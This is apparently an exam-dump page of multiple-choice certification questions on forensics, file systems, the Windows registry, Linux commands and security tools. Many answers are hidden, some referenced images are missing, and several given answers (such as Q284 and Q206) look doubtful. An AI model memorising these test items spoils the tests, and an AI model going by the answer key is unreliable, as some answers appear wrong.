NEW QUESTION: 195 Which of the following is the first computer virus that was used to infect the boot sector of storage media formatted with the DOS File Allocation Table (FAT) file system? A. Melissa B. I love you C. Brain D. Tequila Answer: C (LEAVE A REPLY)

NEW QUESTION: 196 Which of the following switches of the XCOPY command copies file ownerships and NTFS permissions on files while copying the files? A. /p B. /r C. /s D. /o Answer: (SHOW ANSWER)

NEW QUESTION: 197 John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He copies the whole structure of the We-are-secure Web site to the local disk and obtains all the files on the Web site. Which of the following techniques is he using to accomplish his task? A. Web ripping B. Fingerprinting C. TCP FTP proxy scanning D. Eavesdropping Answer: (SHOW ANSWER)

NEW QUESTION: 198 You work as a Network Administrator for Net World International. You have configured the hard disk drive of your computer as shown in the image below:

The computer is configured to dual-boot with Windows 2000 Server and Windows 98. While working on Windows 2000 Server, you save a file on the 6GB partition. You are unable to find the file while working on Windows 98. You are not even able to access the partition on which the file is saved. What is the most likely cause? A. Windows 98 does not support the NTFS file system. B. The file is corrupt. C. Files saved in Windows 98 are not supported by Windows 2000. D. The 6GB partition is corrupt. Answer: A (LEAVE A REPLY)

NEW QUESTION: 199 Which of the following statements about the compression feature of the NTFS file system are true? Each correct answer represents a complete solution. Choose two. A. It supports compression only on volumes. B. Compressed files on an NTFS volume can be read and written by any Windows-based application after they are decompressed. C. It supports compression on volumes, folders, and files. D. Users can work with NTFS-compressed files without decompressing them. Answer: C,D (LEAVE A REPLY)

NEW QUESTION: 200 Which of the following statements about the HKEY_LOCAL_MACHINE registry hive is true? A. It contains configuration data for the current hardware profile. B. It contains information about the local computer system, including hardware and operating system data, such as bus type, system memory, device drivers, and startup control parameters. C. It contains the user profile for the user who is currently logged on to the computer. D. It contains data that associates file types with programs and configuration data for COM objects, Visual Basic programs, or other automation. Answer: (SHOW ANSWER)

NEW QUESTION: 201 Which of the following describes software technologies that improve portability, manageability, and compatibility of applications by encapsulating them from the underlying operating system on which they are executed? A. System registry B. Group Policy C. System control D. Application virtualization Answer: (SHOW ANSWER)

NEW QUESTION: 202 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to allow direct access to the filesystems data structure. Which of the following Unix commands can you use to accomplish the task? A. dosfsck B. df C. du D. debugfs Answer: (SHOW ANSWER)

NEW QUESTION: 203 Which of the following is a type of intruder detection that involves logging network events to a file for an administrator to review later? A. Active detection B. Packet detection C. Event detection D. Passive detection Answer: D (LEAVE A REPLY)

NEW QUESTION: 204 You work as a Network Administrator for NetTech Inc. The company's network is connected to the Internet. For security, you want to restrict unauthorized access to the network with minimum administrative effort. You want to implement a hardware-based solution. What will you do to accomplish this? A. Connect a router to the network. B. Connect a brouter to the network. C. Implement a proxy server on the network. D. Implement firewall on the network. Answer: D (LEAVE A REPLY)

NEW QUESTION: 205 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following pre-attack phases while testing the security of the server: Footprinting Scanning Now he wants to conduct the enumeration phase. Which of the following tools can John use to conduct it? Each correct answer represents a complete solution. Choose all that apply. A. PsFile B. PsPasswd C. UserInfo D. WinSSLMiM Answer: (SHOW ANSWER)

NEW QUESTION: 206 Which of the following statements about registry is true? Each correct answer represents a complete solution. Choose three. A. It can be edited using SCANREG utility. B. It is a centralized configuration database that stores information related to a Windows computer. C. It is divided in many areas known as hives. D. It was first introduced with Windows 95 operating system. Answer: B,C,D (LEAVE A REPLY) NEW QUESTION: 207 Which of the following are advantages of NTFS file system over FAT32 and FAT? Each correct answer represents a part of the solution. Choose two. A. Support for audio files. B. Support for file and folder level permissions. C. Support for Encrypting File System (EFS). D. Support for dual-booting. Answer: B,C (LEAVE A REPLY)

NEW QUESTION: 208 Which of the following statements best describes the consequences of the disaster recovery plan test? A. If no deficiencies were found during the test, then the test was probably flawed. B. The plan should not be changed no matter what the results of the test would be. C. The results of the test should be kept secret. D. If no deficiencies were found during the test, then the plan is probably perfect. Answer: (SHOW ANSWER)

NEW QUESTION: 209 Which of the following tools are used for footprinting? Each correct answer represents a complete solution. Choose all that apply. A. Sam spade B. Brutus C. Whois D. Traceroute Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 210 John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He enters the following command on the Linux terminal: chmod 741 secure.c Considering the above scenario, which of the following statements are true? Each correct answer represents a complete solution. Choose all that apply. A. By the octal representation of the file access permission, John is restricting the group members to only read the secure.c file. B. John is providing all rights to the owner of the file. C. John is restricting a guest to only write or execute the secure.c file. D. The textual representation of the file access permission of 741 will be -rwxr--rw-. Answer: A,B (LEAVE A REPLY) NEW QUESTION: 211 You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. While performing some security investigation, you want to see the hostname and IP address from where users logged in. Which of the following commands will you use to accomplish the task? A. Last B. Dig C. Nslookup D. Netstat Answer: A (LEAVE A REPLY)

NEW QUESTION: 212 John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux- based network. John is working as a root user on the Linux operating system. He wants to forward all the kernel messages to the remote host having IP address 192.168.0.1. Which of the following changes will he perform in the syslog.conf file to accomplish the task? A. !kern.* @192.168.0.1 B. !*.* @192.168.0.1 C. kern.* @192.168.0.1 D. *.* @192.168.0.1 Answer: (SHOW ANSWER)

NEW QUESTION: 213 Which of the following statutes is enacted in the U.S., which prohibits creditors from collecting data from applicants, such as national origin, caste, religion etc? A. The Privacy Act B. The Electronic Communications Privacy Act C. The Equal Credit Opportunity Act (ECOA) D. The Fair Credit Reporting Act (FCRA) Answer: C (LEAVE A REPLY) NEW QUESTION: 214 Which of the following types of virus makes changes to a file system of a disk? A. Stealth virus B. Master boot record virus C. Macro virus D. Cluster virus Answer: D (LEAVE A REPLY)

NEW QUESTION: 215 SIMULATION Fill in the blank with the appropriate name. _____is a list, which specifies the order of volatility of data in a Windows based system. Answer: RFC 3227

NEW QUESTION: 216 Which of the following tables is formed by NTFS file system to keep the track of files, to store metadata, and their location? A. The System File Table B. The File Allocation Table C. The Master Allocation Table D. The Master File Table Answer: D (LEAVE A REPLY)

NEW QUESTION: 217 You work as a Network Administrator for McNeel Inc. You want to encrypt each user's MY DOCUMENTS folder. You decide to use Encrypting File System (EFS). You plan to write a script for encryption. Which of the following tools will you use to encrypt specified folders? A. CIPHER B. Windows Explorer C. EFSINFO D. SYSKEY Answer: A (LEAVE A REPLY)

NEW QUESTION: 218 You work as a Network Administrator for Net World International. Rick, a Sales Manager, complains that his Windows 98 computer is not displaying the taskbar. You reboot his computer and find that the taskbar is still missing. How will you resolve the issue? A. Replace WIN.INI from backup. B. Reinstall Windows 98 on Rick's computer. C. Copy the registry from backup. D. Use Registry Editor to delete the following registry key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerStuckRects Answer: D (LEAVE A REPLY)

NEW QUESTION: 219 Which of the following types of attacks cannot be prevented by technical measures only? A. Brute force B. Social engineering C. Smurf DoS D. Ping flood attack Answer: (SHOW ANSWER)

NEW QUESTION: 220 Sandra, a novice computer user, works on Windows environment. She experiences some problem regarding bad sectors formed in a hard disk of her computer. She wants to run CHKDSK command to check the hard disk for bad sectors and to fix the errors, if any, occurred. Which of the following switches will she use with CHKDSK command to accomplish the task? A. CHKDSK /V /X B. CHKDSK /R /F C. CHKDSK /C /L D. CHKDSK /I Answer: B (LEAVE A REPLY)

NEW QUESTION: 221 HOTSPOT Identify the port in the image given below, which can be connected to the hub to extend the number of ports, and up to 127 devices can be connected to it? Hot Area:

Answer: NEW QUESTION: 222 Adam works as a professional Penetration tester. A project has been assigned to him to employ penetration testing on the network of Umbrella Inc. He is running the test from home and had downloaded every security scanner from the Internet. Despite knowing the IP range of all of the systems, and the exact network configuration, Adam is unable to get any useful results. Which of the following is the most like cause of this problem? Each correct answer represents a complete solution. Choose all that apply. A. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities. B. Security scanners cannot perform vulnerability linkage. C. Security scanners are not designed to do testing through a firewall. D. Security scanners are smart as their database and can find unpublished vulnerabilities. Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 223 Which of the following terms refers to a mechanism which proves that the sender really sent a particular message? A. Integrity B. Authentication C. Confidentiality D. Non-repudiation Answer: (SHOW ANSWER)

NEW QUESTION: 224 Which of the following is a nonvolatile form of memory that can be reprogrammed by using a special programming device, and need not to be removed from the PC to be reprogrammed? A. EPROM B. PROM C. SRAM D. EEPROM E. DRAM Answer: D (LEAVE A REPLY) NEW QUESTION: 225 Which of the following type of file systems is not supported by Linux kernel? A. NTFS B. FAT32 C. HFS D. vFAT Answer: (SHOW ANSWER)

NEW QUESTION: 226 Which of the following is described in the following statement? "It is a 512 bytes long boot sector that is the first sector of a default boot drive. It is also known as Volume Boot Sector, if the boot drive is un-partitioned. " A. POST B. SBR C. BIOS D. MBR Answer: D (LEAVE A REPLY)

NEW QUESTION: 227 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the main server of SecureEnet Inc. The server runs on Debian Linux operating system. Adam wants to investigate and review the GRUB configuration file of the server system. Which of the following files will Adam investigate to accomplish the task? A. /boot/grub/menu.lst B. /boot/boot.conf C. /boot/grub/grub.conf D. /grub/grub.com Answer: A (LEAVE A REPLY)

NEW QUESTION: 228 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to query an image root device and RAM disk size. Which of the following Unix commands can you use to accomplish the task? A. rdev B. setfdprm C. mount D. rdump Answer: A (LEAVE A REPLY)

NEW QUESTION: 229 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He enters the following command on the Linux terminal: chmod -rwSr----- secure.c Considering the above scenario, which of the following statements is true? A. The Sticky bit is set, but other users have no execute permission. B. The Sticky bit is set and other users have the execute permission. C. The SGID bit is set, but the group execute permission is not set. D. The SUID bit is set, but the owner has no execute permission. Answer: (SHOW ANSWER)

NEW QUESTION: 230 Normally, RAM is used for temporary storage of data. But sometimes RAM data is stored in the hard disk, what is this method called? A. Cache memory B. Virtual memory C. Static memory D. Volatile memory Answer: B (LEAVE A REPLY)

NEW QUESTION: 231 Which of the following statements are NOT true about volume boot record or Master Boot Record? Each correct answer represents a complete solution. Choose all that apply. A. The end of MBR marker is h55CC. B. The actual program can be 512 bytes long. C. Four 16 bytes master partition records are present in MBR. D. Volume boot sector is present at cylinder 0, head 0, and sector 1 of the default boot drive. Answer: (SHOW ANSWER)

NEW QUESTION: 232 You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools? A. $SYSTEMROOT$WINDOWS B. $SYSTEMROOT$WINDOWSREGISTRY C. $SYSTEMROOT$REGISTRY D. $SYSTEMROOT$WINDOWSSYSTEM32 Answer: A (LEAVE A REPLY)

NEW QUESTION: 233 Which of the following uses hard disk drive space to provide extra memory for a computer? A. Virtual memory B. RAM C. Cluster D. File system Answer: A (LEAVE A REPLY)

NEW QUESTION: 234 Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected for classified data theft. Suspect's computer runs on Windows operating system. Peter wants to collect data and evidences for further analysis. He knows that in Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis. Which of the following is the correct order for searching data on a Windows based system? A. Volatile data, file slack, registry, memory dumps, file system, system state backup, internet traces B. Volatile data, file slack, internet traces, registry, memory dumps, system state backup, file system C. Volatile data, file slack, registry, system state backup, internet traces, file system, memory dumps D. Volatile data, file slack, file system, registry, memory dumps, system state backup, internet traces Answer: D (LEAVE A REPLY)

NEW QUESTION: 235 Which of the following parameters is NOT used for calculating the capacity of the hard disk? A. Bytes per sector B. Number of heads C. Total number of sectors D. Number of platters Answer: (SHOW ANSWER) NEW QUESTION: 236 Which of the following tools is used to extract human understandable interpretation from the computer binary files? A. Galleta B. FTK Imager C. Word Extractor D. FAU Answer: (SHOW ANSWER)

NEW QUESTION: 237 Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive? A. /sbin/lilo B. /boot/map C. /etc/lilo.conf D. /boot/boot.b Answer: B (LEAVE A REPLY)

NEW QUESTION: 238 Which of the following NIST RA process steps has the goal to identify the potential threat-sources and compile a threat statement listing the potential threat-sources that are applicable to the IT system being evaluated? A. Control Analysis B. Impact Analysis C. Vulnerability Identification D. Threat Identification Answer: D (LEAVE A REPLY)

NEW QUESTION: 239 You work as a Network Administrator for NetTech Inc. To ensure the security of files, you encrypt data files using Encrypting File System (EFS). You want to make a backup copy of the files and maintain security settings. You can backup the files either to a network share or a floppy disk. What will you do to accomplish this? A. Copy the files to a network share on a FAT32 volume. B. Copy the files to a floppy disk that has been formatted using Windows 2000 Professional. C. Copy the files to a network share on an NTFS volume. D. Place the files in an encrypted folder. Then, copy the folder to a floppy disk. Answer: C (LEAVE A REPLY)

NEW QUESTION: 240 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to print the super block and block the group information for the filesystem present on a system. Which of the following Unix commands can you use to accomplish the task? A. e2fsck B. dumpe2fs C. e2label D. dump Answer: (SHOW ANSWER)

NEW QUESTION: 241 Which of the following are the two different file formats in which Microsoft Outlook saves e-mail messages based on system configuration? Each correct answer represents a complete solution. Choose two. A. .txt B. .xst C. .pst D. .ost Answer: (SHOW ANSWER)

NEW QUESTION: 242 Which of the following is included in a memory dump file? A. Security ID B. Stop message and its parameters C. List of loaded drivers D. The kernel-mode call stack for the thread that stopped the process from execution Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 243 Which of the following commands is used to create or delete partitions on Windows XP? A. fdisk B. DISKPART C. Part D. Active Answer: (SHOW ANSWER)

NEW QUESTION: 244 Mark works as a Network Administrator for Net Perfect Inc. The company has a Linux-based network. Mark installs a Checkpoint Firewall NGX on a SecurePlatform device. He performs a scheduled backup of his system settings and products configuration. Where are these backup files stored? Each correct answer represents a complete solution. Choose all that apply. A. Locally on the SecurePlatform machine hard drive B. SCP C. TFTP D. On a PC in a file named userC Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 245 You work as a Network Administrator for Blue Well Inc. Your company's network has a Windows 2000 server with the FAT file system. This server stores sensitive data. You want to encrypt this data to protect it from unauthorized access. You also have to accomplish the following goals: Data should be encrypted and secure. Administrative effort should be minimum. You should have the ability to recover encrypted files in case the file owner leaves the company. Other permissions on encrypted files should be unaffected. File-level security is required on the disk where data is stored. Encryption or decryption of files should not be the responsibility of the file owner. You take the following steps to accomplish these goals: Convert the FAT file system to NTFS file system. Use third-party data encryption software. What will happen after taking these steps? Each correct answer represents a complete solution. Choose all that apply. A. Encryption or decryption of files will no longer be the responsibility of the file owner. B. Data will be encrypted and secure. C. Other permissions on encrypted files will remain unaffected. D. Administrative effort will be minimum. E. File-level security will be available on the disk where data is stored. Answer: B,C,E (LEAVE A REPLY)

NEW QUESTION: 246 You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. The network is configured on IP version 6 protocol. All the computers on the network are connected to a switch device. One day, users complain that they are unable to connect to a file server. You try to ping the client computers from the server, but the pinging fails. You try to ping the server's own loopback address, but it fails to ping. You restart the server, but the problem persists. What is the most likely cause? A. The server's NIC is not working. B. The switch device is not working. C. The cable that connects the server to the switch is broken. D. Automatic IP addressing is not working. E. The server is configured with unspecified IP address. Answer: A (LEAVE A REPLY)

NEW QUESTION: 247 Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes. When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results: C:\WINDOWS>netstat -an | find "UDP" UDP IP_Address:31337 *:* Now you check the following registry address: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your computer on the basis of the above evidence? A. Back Orifice B. Donald Dick C. Qaz D. Tini Answer: A (LEAVE A REPLY)

NEW QUESTION: 248 Sandra wants to create a full system state backup of her computer, which is running on Microsoft Windows XP operating system. Which of the following is saved in full state system backup? Each correct answer represents a complete solution. Choose all that apply. A. Active Directory (NTDS) B. Registry C. Windows boot files D. file system information Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 249 Which of the following statements is NOT true about FAT16 file system? Each correct answer represents a complete solution. Choose all that apply. A. FAT16 file system works well with large disks because the cluster size increases as the disk partition size increases. B. FAT16 does not support file-level security. C. FAT16 file system supports Linux operating system. D. FAT16 file system supports file-level compression. Answer: (SHOW ANSWER)

NEW QUESTION: 250 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him by the chief security officer of a cloth manufacturing company who suspects that one of the employees is selling the design of the clothes outside the company. The security officer asked Adam to investigate the iPhone of the employee, as he suspects that there might be some sensitive information stored in his iPhone. On investigation Adam found out that the employee tries to destroy the evidence on his iPhone. He presses and holds the Home and Power buttons until the device is forced into recovery mode. Which of the following actions occurred when iPhone is set into recovery mode? A. Data will be destroyed. B. Nothing will happen. C. iPhone will be prevented from booting temporarily. D. The file system will be destroyed. Answer: C (LEAVE A REPLY)

NEW QUESTION: 251 Which of the following is used to store configuration settings and options on Microsoft Windows operating systems? A. Group policy editor B. Windows setting C. Windows Config file D. Windows Registry Answer: (SHOW ANSWER)

NEW QUESTION: 252 Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information. Which of the following disk spaces will he use to store this secret information? Each correct answer represents a complete solution. Choose all that apply. A. Dumb space B. Hidden partition C. Unused Sectors D. Slack space Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 253 Peter, an expert computer user, attached a new sound card to his computer. He then restarts the computer, so that the BIOS can scan the hardware changes. What will be the memory range of ROM that the BIOS scan for additional code to be executed for proper working of soundcard? A. hCA79 to hAC20 B. hAA43 to hF345 C. hDF80 to hFF80 D. hC800 to hDF80 Answer: D (LEAVE A REPLY)

NEW QUESTION: 254 Which of the following file systems is designed by Sun Microsystems? A. ZFS B. ext2 C. NTFS D. CIFS Answer: A (LEAVE A REPLY)

NEW QUESTION: 255 Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure? A. Black Hat B. White Hat C. Gray Hat D. Security providing organizations Answer: A (LEAVE A REPLY)

NEW QUESTION: 256 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter? A. PFR image file B. RAW image file C. iso image file D. EnCase image file Answer: C (LEAVE A REPLY)

NEW QUESTION: 257 Which of the following directories cannot be placed out of the root filesystem? Each correct answer represents a complete solution. Choose all that apply. A. /lib B. /sbin C. /var D. /etc Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 258 Which of the following hardware devices prevents broadcasts from crossing over subnets? A. Modem B. Router C. Bridge D. Hub Answer: (SHOW ANSWER)

NEW QUESTION: 259 Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model? A. Physical layer, network layer, transport layer, data link layer, session layer, presentation layer, and application layer B. Physical layer, data link layer, network layer, transport layer, presentation layer, session layer, and application layer C. Physical layer, data link layer, network layer, transport layer, session layer, presentation layer, and application layer D. application layer, presentation layer, network layer, transport layer, session layer, data link layer, and physical layer Answer: C (LEAVE A REPLY)

NEW QUESTION: 260 An executive in your company reports odd behavior on her PDA. After investigation you discover that a trusted device is actually copying data off the PDA. The executive tells you that the behavior started shortly after accepting an e-business card from an unknown person. What type of attack is this? A. PDA Hijacking B. Privilege Escalation C. Session Hijacking D. Bluesnarfing Answer: (SHOW ANSWER)

NEW QUESTION: 261 In which of the following access control models can a user not grant permissions to other users to see a copy of an object marked as secret that he has received, unless they have the appropriate permissions? A. Mandatory Access Control (MAC) B. Access Control List (ACL) C. Role Based Access Control (RBAC) D. Discretionary Access Control (DAC) Answer: A (LEAVE A REPLY)

NEW QUESTION: 262 Which of the following encryption methods uses AES technology? A. Static WEP B. TKIP C. Dynamic WEP D. CCMP Answer: (SHOW ANSWER)

NEW QUESTION: 263 Which of the following statements are true about Compact Disc (CD) and Digital Versatile Disk (DVD)? Each correct answer represents a complete solution. Choose all that apply. A. CDs and DVDs are not affected by X-rays, and other sources of electromagnetic radiation. B. Data is encoded in the form of tiny pits on the surface of the CD and DVD. C. CDs and DVDs are affected by EMP from nuclear detonations. D. It takes a small amount of energy to affect the data that written on CD and DVD. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 264 Which of the following tools is an asterisk password revealer tool? A. SnadBoy B. Pwdump3 C. Aircrack D. Cain and Abel Answer: A (LEAVE A REPLY)

NEW QUESTION: 265 Which of the following is used for remote file access by UNIX/Linux systems? A. Server Message Block (SMB) B. Network File System (NFS) C. NetWare Core Protocol (NCP) D. Common Internet File System (CIFS) Answer: B (LEAVE A REPLY)

NEW QUESTION: 266 You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below: What is the IP address of the sender of this email? A. 209.191.91.180 B. 172.16.10.90 C. 141.1.1.1 D. 216.168.54.25 Answer: D (LEAVE A REPLY)

NEW QUESTION: 267 Which of the following file attributes are not available on a FAT32 partition? Each correct answer represents a complete solution. Choose two. A. Compression B. Hidden C. Archive D. Read Only E. Encryption Answer: A,E (LEAVE A REPLY)

NEW QUESTION: 268 Which of the following components are usually found in an Intrusion detection system (IDS)? Each correct answer represents a complete solution. Choose two. A. Sensor B. Firewall C. Gateway D. Console E. Modem Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 269 Joseph works as a Web Designer for WebTech Inc. He creates a Web site and wants to protect it from lawsuits. Which of the following steps will he take to accomplish the task? Each correct answer represents a part of the solution. Choose all that apply. A. Restrict the access to the site. B. Restrict shipping in certain areas. C. Restrict the transfer of information. D. Restrict customers according to their locations. Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 270 Adam works as a professional Computer Hacking Forensic Investigator. He has been called by the FBI to examine data of the hard disk, which is seized from the house of a suspected terrorist. Adam decided to acquire an image of the suspected hard drive. He uses a forensic hardware tool, which is capable of capturing data from IDE, Serial ATA, SCSI devices, and flash cards. This tool can also produce MD5 and CRC32 hash while capturing the data. Which of the following tools is Adam using? A. FireWire DriveDock B. ImageMASSter 4002i C. Wipe MASSter D. ImageMASSter Solo-3 Answer: (SHOW ANSWER)

NEW QUESTION: 271 Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files? A. Spoofing B. File integrity auditing C. Reconnaissance D. Shoulder surfing Answer: (SHOW ANSWER)

NEW QUESTION: 272 Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task? A. Pslist B. Psloggedon C. ping D. fport Answer: D (LEAVE A REPLY)

NEW QUESTION: 273 Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process? A. Reconnaissance B. Scanning C. Preparation D. gaining access Answer: C (LEAVE A REPLY)

NEW QUESTION: 274 Which of the following types of evidence is considered as the best evidence? A. Information gathered through the witness's senses B. A copy of the original document C. A computer-generated record D. The original document Answer: D (LEAVE A REPLY)

NEW QUESTION: 275 Which of the following statements about an extended partition are true? Each correct answer represents a complete solution. Choose two. A. A maximum of four extended partitions can exist on a single basic disk. B. It cannot contain more than one logical drive. C. It can be sub-divided into logical drives. D. It cannot be formatted or assigned a drive letter. Answer: (SHOW ANSWER)

NEW QUESTION: 276 Which of the following file systems are supported by Windows 2000 operating systems? Each correct answer represents a complete solution. Choose all that apply. A. NTFS4 B. CDFS C. HPFS D. FAT32 E. NTFS5 Answer: A,B,D,E (LEAVE A REPLY)

NEW QUESTION: 277 Brutus is a password cracking tool that can be used to crack the following authentications: HTTP (Basic Authentication) HTTP (HTML Form/CGI) POP3 (Post Office Protocol v3) FTP (File Transfer Protocol) SMB (Server Message Block) Telnet Which of the following attacks can be performed by Brutus for password cracking? Each correct answer represents a complete solution. Choose all that apply. A. Hybrid attack B. Brute force attack C. Dictionary attack D. Replay attack E. Man-in-the-middle attack Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 278 Which of the following directories in Linux operating system contains device files, which refers to physical devices? A. /bin B. /dev C. /etc D. /boot Answer: (SHOW ANSWER)

NEW QUESTION: 279 Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario? A. Alternate Data Streams is a feature of Linux operating system. B. Adam is using FAT file system. C. Adam is using NTFS file system. D. Adam's system runs on Microsoft Windows 98 operating system. Answer: C (LEAVE A REPLY)

NEW QUESTION: 280 Which of the following standard file formats is used by Apple's iPod to store contact information? A. HFS+ B. vCard C. hCard D. FAT32 Answer: (SHOW ANSWER)

NEW QUESTION: 281 Which of the following Incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an enterprise? A. Recovery phase B. Preparation phase C. Eradication phase D. Containment phase E. Identification phase Answer: B (LEAVE A REPLY)

NEW QUESTION: 282 Which of the following tools is used to restore deleted files from Linux and Mac OS X file system? A. Easy-Undelete B. Active@ UNERASER C. Active@ UNDELETE D. R-Undelete Answer: A (LEAVE A REPLY)

NEW QUESTION: 283 John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation? A. Data will be stored on the ROM. B. Data will be saved before the system is switched off if you have configured hibernation to save data. C. Data will be saved automatically before the system is switched off. D. Unsaved data will be lost when hibernation switches off the system. Answer: C (LEAVE A REPLY) NEW QUESTION: 284 Your network has a Windows 2000 Server computer with FAT file system, shared by several users. This system stores sensitive data. You decide to encrypt this data to protect it from unauthorized access. You want to accomplish the following goals: Data should be secure and encrypted. Administrative efforts should be minimum. You should have the ability to recover encrypted files in case the file owner leaves the company. Other permissions on encrypted files should be unaffected. File-level security is required on the disk where data is stored. Encrypting or decrypting of files should not be the responsibility of the file owner. You take the following steps to accomplish these goals : Convert the FAT file system to Windows 2000 NTFS file system. Use Encrypting File System (EFS) to encrypt data. Which of the following goals will you be able to accomplish? Each correct answer represents a complete solution. Choose all that apply. A. File-level security is available on the disk where data is stored. B. You have the ability to recover encrypted files in case the file owner leaves the company. C. Data are secured and encrypted. D. Administrative efforts are minimum. E. Encrypting or decrypting of files is no longer the responsibility of the file owner. F. Other permissions on encrypted files are unaffected. Answer: A,B,C,D,E,F (LEAVE A REPLY)

NEW QUESTION: 285 You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. History folder B. Cookies folder C. Temporary Internet Folder D. Download folder Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 286 Peter works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He has been assigned with a project of investigating a disloyal employee who is accused of stealing secret data from the company and selling it to the competitor company. Peter is required to collect proper evidences and information to present before the court for prosecution. Which of the following parameters is necessary for successful prosecution of this corporate espionage? A. To prove that the information has a value. B. To submit investigative report to senior officials. C. To present the evidences before the court. D. To prove that the data belongs to the company. Answer: A (LEAVE A REPLY)

NEW QUESTION: 287 You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate Cross- Site Scripting attack on your company's Website. Which of the following methods of investigation can you use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers. B. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site. C. Look at the Web servers logs and normal traffic logging. D. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source. Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 288 Adam works as a Security Analyst for Umbrella Inc. He suspects that a virus exists in the network of the company. He scanned the client system with latest signature-based anti-virus, but no productive results have been obtained. Adam suspects that a polymorphic virus exists in the network. Which of the following statements are true about the polymorphic virus? Each correct answer represents a complete solution. Choose all that apply. A. It has the ability to mutate and can change its known viral signature and hide from signature based antivirus programs. B. The new virus resides in the main memory of the computer and does not infect other files of the operating system. C. When the user runs the infected file in the disk, it loads virus into the RAM. D. The mutation engine of polymorphic virus generates a new encrypted code, this changes the signature of the virus. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 289 Which of the following anti-child pornography organizations helps local communities to create programs and develop strategies to investigate child exploitation? A. Innocent Images National Imitative (IINI) B. Project Safe Childhood (PSC) C. Internet Crimes Against Children (ICAC) D. Anti-Child Porn.org Answer: B (LEAVE A REPLY)

NEW QUESTION: 290 You are reviewing a Service Level Agreement between your company and a Web development vendor. Which of the following are security requirements you should look for in this SLA? Each correct answer represents a complete solution. Choose all that apply. A. Security Monitoring B. Time to respond to bug reports C. Encryption standards D. Guarantees on known security flaws Answer: A,B,C,D (LEAVE A REPLY)

